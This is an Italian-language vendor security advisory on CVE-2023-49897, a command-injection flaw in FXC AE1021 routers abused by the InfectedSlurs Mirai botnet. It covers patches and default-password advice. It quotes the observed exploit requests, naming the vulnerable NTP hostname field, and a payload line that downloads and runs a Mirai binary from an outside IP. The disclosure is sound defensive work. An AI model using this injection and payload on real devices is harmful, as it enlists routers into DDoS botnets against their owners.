Vulnerabilità sfruttata attivamente nei router FXC: correzioni e patch disponibili
Questo blog è un aggiornamento del post pubblicato in precedenza dal team SIRT sulla campagna InfectedSlurs .
Analisi riassuntiva
Il team SIRT (Security Intelligence Response Team) di Akamai ha pubblicato un aggiornamento alla serie di raccomandazioni sulla campagna InfectedSlurs dopo il rilascio delle guide e delle versioni firmware corrette con patch da parte di uno dei fornitori interessati.
Alla vulnerabilità è stato assegnato l'ID CVE-2023-49897 con un punteggio CVSS v3 di 8,0.
Tra i router interessati figurano i router FXC (Future X Communications) AE1021 e AE1021PE con le versioni firmware 2.0.9 e precedenti.
I payload dannosi acquisiti in rete installano un malware basato su Mirai con l'intenzione di creare una botnet DDoS (Distributed Denial-of-Service) .
Nella ricerca originale, abbiamo incluso un elenco completo degli indicatori di compromissione (IOC) e delle regole Snort e YARA per aiutare a identificare questi tentativi di sfruttamento in rete e le possibili infezioni attive sulle reti dei sistemi di difesa.
Cosa dovete sapere
Nell'ambito del rilevamento di InfectedSlurs, il team SIRT ha scoperto una vulnerabilità nei router FXC AE1021 e AE1021PE che viene attivamente sfruttata in rete. Questo dispositivo viene descritto come un router LAN wireless progettato per alberghi e unità residenziali. È stato prodotto in Giappone da FXC. A questa vulnerabilità è stato assegnato l'ID CVE-2023-49897 con un punteggio CVSS v3 di 8,0.
La vulnerabilità consente ad un criminale autenticato di sferrare un attacco di inserimento di comandi del sistema operativo (OS Command Injection) con un payload trasmesso tramite una richiesta POST all'interfaccia di gestione. Nella sua configurazione attuale, vengono utilizzate le credenziali predefinite del dispositivo nei payload acquisiti.
Le versioni firmware interessate sono:
Versione firmware AE1021PE 2.0.9 e versioni precedenti
Versione firmware AE1021 2.0.9 e versioni precedenti
Il fornitore (FXC) ha rilasciato una versione corretta con patch del firmware del dispositivo per correggere la vulnerabilità. Il fornitore suggerisce ai proprietari dei dispositivi di aggiornare il firmware alla versione 2.0.10 non appena possibile e di ripristinare le impostazioni di fabbrica dei propri dispositivi, cambiando anche la password di accesso alla schermata di gestione predefinita al primo avvio.
I suggerimenti del fornitore sono disponibili all'indirizzo https://www.fxc.jp/news/20231206 , mentre altri consigli sono stati pubblicati da JPCERT all'indirizzo https://jvn.jp/en/vu/JVNVU92152057/ (versione in giapponese: https://jvn.jp/vu/JVNVU92152057/).
Rilevamento di uno sfruttamento
I payload identificati in rete riguardano l'installazione di un malware basato su Mirai. La campagna si propone di creare una botnet con l'intento di sferrare attacchi DDoS più facilmente. Questa botnet è stata descritta in dettaglio nel nostro post iniziale.
È difficile stimare quanti dispositivi presenti in rete siano potenzialmente vulnerabili o vengano attivamente violati perché i payload di attacco acquisiti si basano sull'uso delle loro credenziali di autenticazione predefinite.
Poiché il criminale deve essere autenticato, sono state osservate due interazioni generate dal criminale. Riteniamo che la prima di queste interazioni sia semplicemente un tentativo di fingerprinting. L'interazione è stata rivolta all'URL dell'endpoint /cgi-bin/login.apply utilizzando le credenziali predefinite (Figura 1).
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Figura 1. Tentativo di autenticazione del router FXC
In caso di riuscita dell'autenticazione, all'URL dell'endpoint /cgi-bin/action viene distribuito un payload dell'exploit circa tre secondi dopo (Figura 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Figura 2. Tentativo di sfruttamento del router FXC
I payload dell'exploit acquisiti in rete tentano di sfruttare la vulnerabilità OS Command Injection per distribuire una variante compilata da MIPS della botnet Mirai (Figura 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Figura 3. Payload di esecuzione di codice remoto osservati in rete
Nella nostra pubblicazione iniziale, il team SIRT di Akamai ha fornito un elenco completo degli indicatori di compromissione (IOC) e delle regole Snort e YARA per aiutare a identificare questi tentativi di sfruttamento in rete e le possibili infezioni attive sulle reti dei sistemi di difesa.
Conclusione
Le campagne che prendono di mira l'IoT (Internet of Things) causano innumerevoli istanze, in cui i dispositivi utilizzati ogni giorno dagli utenti vengono inconsapevolmente coinvolti in una serie di azioni dannose. Le botnet DDoS e gli schemi di cryptomining sono solo alcuni dei risultati che possono verificarsi a totale insaputa degli utenti i cui dispositivi sono interessati. In alcuni casi, gli utenti potrebbero addirittura non sapere che è possibile cambiare le credenziali su questi dispositivi.
Questa rivelazione mette in evidenza la necessità di aumentare la consapevolezza e l'informazione sulle best practice relative all'IoT e sui rischi associati al consumatore medio. La necessità di consapevolezza non è esclusiva dei consumatori: riguarda anche i produttori di questi dispositivi da "impostare e dimenticare".
Le procedure di sicurezza di base sono fondamentali
Le procedure di base sono fondamentali. Queste osservazioni ancora una volta evidenziano l'importanza di seguire procedure di sicurezza di base, come cambiare le password predefinite sui dispositivi durante la configurazione iniziale, come anche di implementare protocolli proattivi che garantiscono una sicurezza ancora maggiore nel lungo termine, come aggiornare costantemente i sistemi per proteggerli da potenziali attacchi e controllare occasionalmente i sistemi/dispositivi, specialmente se si notano comportamenti insoliti.
Tenetevi al passo
L'Akamai Security Intelligence Group continuerà a monitorare minacce come queste e fornirà i relativi rapporti per aumentare la consapevolezza nei nostri clienti e nella comunità della sicurezza in generale. Per ulteriori ricerche, seguiteci su X(in precedenza, noto come Twitter) per tenervi aggiornati su ciò che stiamo osservando.
Il team SIRT di Akamai desidera ringraziare tutti in CISA, US- CERT, CERT e FXC per la loro assistenza nel processo di comunicazione, coordinamento, identificazione, mitigazione e divulgazione.
Desideriamo anche ringraziare Ryu Kuki, Takayuki Sasakie Katsunari Yoshioka della Yokohama National University per il loro scrupoloso lavoro. Anche se non abbiamo lavorato con loro direttamente, ci è stato riferito che hanno segnalato la stessa vulnerabilità a JPCERT e FXC approssimativamente nello stesso periodo in cui abbiamo pubblicato i nostri rapporti. È sempre straordinario trovare esperti di sicurezza che si impegnano attivamente nel rendere Internet un posto migliore e più sicuro per tutto.
